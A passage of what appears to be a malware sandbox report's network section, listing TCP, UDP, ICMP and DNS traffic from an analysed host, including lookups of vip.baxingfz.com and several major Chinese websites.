                                                                                                                                    Aug 6, 2024 10:30:42.657532930 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657543898 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657556057 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657557011 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.657572985 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.657576084 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657587051 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657603025 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657613039 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.657613993 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657624960 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657624960 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.657635927 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657646894 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657658100 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657659054 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.657690048 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.657744884 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657747030 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.657756090 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657766104 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657859087 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.657988071 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657998085 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.658010006 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.658020973 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.658031940 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.658045053 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.658045053 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.658070087 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.658144951 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.658155918 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.658166885 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.658178091 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.658190966 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.658202887 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.658231974 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.658277035 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.658277988 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.658288002 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.658298969 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.658309937 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.658319950 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.658329964 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.658329964 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.658341885 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.658345938 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.658353090 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.658364058 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.658368111 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.658386946 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.658457041 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.658942938 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.658955097 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.658965111 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.658977032 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.658987045 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.658999920 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.659007072 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.659012079 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.659099102 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.659216881 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.666424990 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.673429012 CEST4978180192.168.2.627.221.16.179

                                                                                                                                    UDP Packets

                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    Aug 6, 2024 10:29:14.347779989 CEST5688053192.168.2.61.1.1.1
                                                                                                                                    Aug 6, 2024 10:29:14.930998087 CEST53568801.1.1.1192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:16.166680098 CEST5688153192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:29:16.167179108 CEST5688253192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:29:16.227896929 CEST5688353192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:29:16.228405952 CEST5688453192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:29:16.290030003 CEST5688553192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:29:16.290535927 CEST5688653192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:29:16.352000952 CEST5688753192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:29:16.352314949 CEST5688853192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:29:16.417828083 CEST5688953192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:29:16.419177055 CEST5689053192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:29:16.425834894 CEST53568908.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:16.477546930 CEST5689153192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:29:16.479456902 CEST5689253192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:29:16.495043039 CEST53568848.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:16.538749933 CEST5689353192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:29:16.538976908 CEST5689453192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:29:16.572799921 CEST53568948.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:16.575309992 CEST5356885114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:16.580492973 CEST5356881114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:16.580724001 CEST53568888.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:16.593676090 CEST5356887114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:16.603975058 CEST53568828.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:16.617938042 CEST5689553192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:29:16.618623018 CEST5689653192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:29:16.664571047 CEST5356889114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:16.667047977 CEST5356883114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:16.680048943 CEST5689753192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:29:16.681225061 CEST5689853192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:29:16.742954016 CEST5689953192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:29:16.743235111 CEST5690053192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:29:16.750158072 CEST53569008.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:16.780317068 CEST5356895114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:16.789450884 CEST5356893114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:16.805212021 CEST5690153192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:29:16.806539059 CEST5690253192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:29:16.817569017 CEST5356891114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:16.820195913 CEST53568928.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:16.866971016 CEST5690353192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:29:16.867253065 CEST5690453192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:29:16.913837910 CEST5356899114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:16.930974960 CEST5690553192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:29:16.931505919 CEST5690653192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:29:16.935386896 CEST5356897114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:16.973156929 CEST53568988.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:16.993026972 CEST5690753192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:29:16.994179964 CEST5690853192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:29:17.007211924 CEST53569088.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:17.061537981 CEST5690953192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:29:17.062645912 CEST5691053192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:29:17.096920013 CEST53569048.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:17.115356922 CEST5356903114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:17.143141031 CEST53568868.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:17.160557985 CEST5691153192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:29:17.161935091 CEST5691253192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:29:17.175231934 CEST5356906114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:17.175774097 CEST5356901114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:17.200793982 CEST53568968.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:17.222373962 CEST53569028.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:17.228934050 CEST5691353192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:29:17.230787039 CEST53569108.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:17.249516010 CEST5691453192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:29:17.289525986 CEST5691553192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:29:17.290702105 CEST5691653192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:29:17.314842939 CEST5356909114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:17.322776079 CEST5356907114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:17.350898027 CEST5691753192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:29:17.351804972 CEST5691853192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:29:17.416558981 CEST5691953192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:29:17.479969978 CEST5692053192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:29:17.483867884 CEST5356913114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:17.485568047 CEST5692153192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:29:17.486685991 CEST5692253192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:29:17.495548964 CEST5356911114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:17.503104925 CEST53569228.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:17.517968893 CEST5356917114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:17.562191010 CEST53569128.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:17.616939068 CEST5356915114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:17.650818110 CEST53569188.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:17.659220934 CEST5356919114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:17.718739986 CEST53569148.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:17.814834118 CEST5356920114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:17.871696949 CEST53569168.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:17.932070971 CEST53569058.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:18.279093981 CEST53569218.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:18.859138966 CEST6489053192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:29:18.859142065 CEST6488953192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:29:19.101433039 CEST5364890114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:19.301512957 CEST6489153192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:29:19.301518917 CEST6489253192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:29:19.551579952 CEST5364891114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:20.189661980 CEST53648898.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:20.537097931 CEST53648928.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:33.846215010 CEST4960753192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:29:33.846216917 CEST4960853192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:29:34.074068069 CEST53496078.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:34.094791889 CEST5349608114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:00.667958975 CEST5190353192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:30:00.668867111 CEST5190453192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:30:00.725893974 CEST5190553192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:30:00.737128973 CEST5190653192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:30:00.749248981 CEST53519068.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:00.788263083 CEST5190753192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:30:00.789108992 CEST5190853192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:30:00.857352018 CEST6175053192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:30:00.858258009 CEST6175153192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:30:00.918531895 CEST6175253192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:30:00.919440031 CEST6175353192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:30:00.926423073 CEST53617538.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:00.975872993 CEST6175453192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:30:00.976682901 CEST6175553192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:30:00.979127884 CEST5351905114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:00.996315956 CEST5351903114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.046725035 CEST6175653192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:30:01.047578096 CEST6175753192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:30:01.102458000 CEST6175853192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:30:01.103379011 CEST6175953192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:30:01.105144978 CEST5361750114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.142546892 CEST53617558.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.220355034 CEST6176053192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:30:01.220412016 CEST6176153192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:30:01.220817089 CEST5361756114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.226829052 CEST53617618.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.239377022 CEST53519048.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.249089003 CEST5361752114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.272392035 CEST5361758114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.275808096 CEST6176253192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:30:01.280694008 CEST6176353192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:30:01.289340019 CEST53617638.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.309252024 CEST5361754114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.335782051 CEST6176453192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:30:01.336170912 CEST6176553192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:30:01.346046925 CEST53617648.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.368020058 CEST53617518.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.398235083 CEST6176653192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:30:01.398303986 CEST6176753192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:30:01.412667990 CEST53617678.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.432382107 CEST53617598.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.460153103 CEST6176953192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:30:01.461935043 CEST6176853192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:30:01.467128992 CEST5361760114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.514287949 CEST53617578.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.522444963 CEST6177053192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:30:01.523467064 CEST6177153192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:30:01.531963110 CEST53617718.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.531980038 CEST5361762114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.585089922 CEST6177253192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:30:01.585092068 CEST6177353192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:30:01.591969013 CEST53617738.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.647608042 CEST6177453192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:30:01.647656918 CEST6177553192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:30:01.666521072 CEST5361765114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.692784071 CEST5361770114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.700316906 CEST5361769114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.706410885 CEST53617688.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.710131884 CEST6177653192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:30:01.710187912 CEST6177753192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:30:01.739398003 CEST5361766114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.773154974 CEST6177853192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:30:01.773387909 CEST6177953192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:30:01.782965899 CEST53617788.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.811379910 CEST5361775114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.828820944 CEST5361772114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.835818052 CEST6178053192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:30:01.836400032 CEST6178153192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:30:01.845002890 CEST53617818.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.899612904 CEST6178253192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:30:01.899940968 CEST6178353192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:30:01.923161983 CEST53617748.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.966033936 CEST6178453192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:30:01.967104912 CEST6178553192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:30:01.967808008 CEST6178653192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:30:01.968305111 CEST6178753192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:30:02.204190016 CEST5361779114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.204201937 CEST5361776114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.206131935 CEST5361783114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.206163883 CEST5361780114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.206176043 CEST53617828.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.207051992 CEST53617878.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.450134039 CEST5361784114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.450706005 CEST5361786114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.505940914 CEST53617858.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.636137962 CEST53617778.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:03.858536959 CEST6178853192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:30:03.858745098 CEST6178953192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:30:03.869155884 CEST53617888.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:04.109668970 CEST5361789114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:04.380671024 CEST6179053192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:30:04.381463051 CEST6179153192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:30:04.388722897 CEST53617918.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:04.630693913 CEST5361790114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:16.086548090 CEST6179253192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:30:16.087412119 CEST6179353192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:30:16.093761921 CEST53617928.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:16.487037897 CEST5361793114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:23.708192110 CEST6045253192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:30:23.708462000 CEST6045353192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:30:23.715434074 CEST53604538.8.8.8192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:23.954931974 CEST5360452114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:33.922277927 CEST5461253192.168.2.6114.114.114.114
                                                                                                                                    Aug 6, 2024 10:30:33.923546076 CEST5461353192.168.2.68.8.8.8
                                                                                                                                    Aug 6, 2024 10:30:34.259304047 CEST5354612114.114.114.114192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.282016993 CEST53546138.8.8.8192.168.2.6

                                                                                                                                    ICMP Packets

                                                                                                                                    TimestampSource IPDest IPChecksumCodeType
                                                                                                                                    Aug 6, 2024 10:29:19.103301048 CEST192.168.2.627.221.16.17973d7Echo
                                                                                                                                    Aug 6, 2024 10:29:19.292073965 CEST27.221.16.179192.168.2.67bd7Echo Reply
                                                                                                                                    Aug 6, 2024 10:30:03.870451927 CEST192.168.2.627.221.16.149c211Echo
                                                                                                                                    Aug 6, 2024 10:30:04.321327925 CEST27.221.16.149192.168.2.6ca11Echo Reply

                                                                                                                                    DNS Queries

                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                    Aug 6, 2024 10:29:14.347779989 CEST192.168.2.61.1.1.10xd05Standard query (0)vip.baxingfz.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.166680098 CEST192.168.2.6114.114.114.1140x100Standard query (0)www.sogou.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.167179108 CEST192.168.2.68.8.8.80x100Standard query (0)www.sogou.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.227896929 CEST192.168.2.6114.114.114.1140x100Standard query (0)www.qq.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.228405952 CEST192.168.2.68.8.8.80x100Standard query (0)www.qq.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.290030003 CEST192.168.2.6114.114.114.1140x100Standard query (0)www.sina.com.cnA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.290535927 CEST192.168.2.68.8.8.80x100Standard query (0)www.sina.com.cnA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.352000952 CEST192.168.2.6114.114.114.1140x100Standard query (0)www.so.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.352314949 CEST192.168.2.68.8.8.80x100Standard query (0)www.so.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.417828083 CEST192.168.2.6114.114.114.1140x100Standard query (0)www.baidu.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.419177055 CEST192.168.2.68.8.8.80x100Standard query (0)www.baidu.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.477546930 CEST192.168.2.6114.114.114.1140x100Standard query (0)soso.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.479456902 CEST192.168.2.68.8.8.80x100Standard query (0)soso.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.538749933 CEST192.168.2.6114.114.114.1140x100Standard query (0)www.jd.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.538976908 CEST192.168.2.68.8.8.80x100Standard query (0)www.jd.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.617938042 CEST192.168.2.6114.114.114.1140x100Standard query (0)www.1688.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.618623018 CEST192.168.2.68.8.8.80x100Standard query (0)www.1688.comA (IP address)IN (0x0001)false
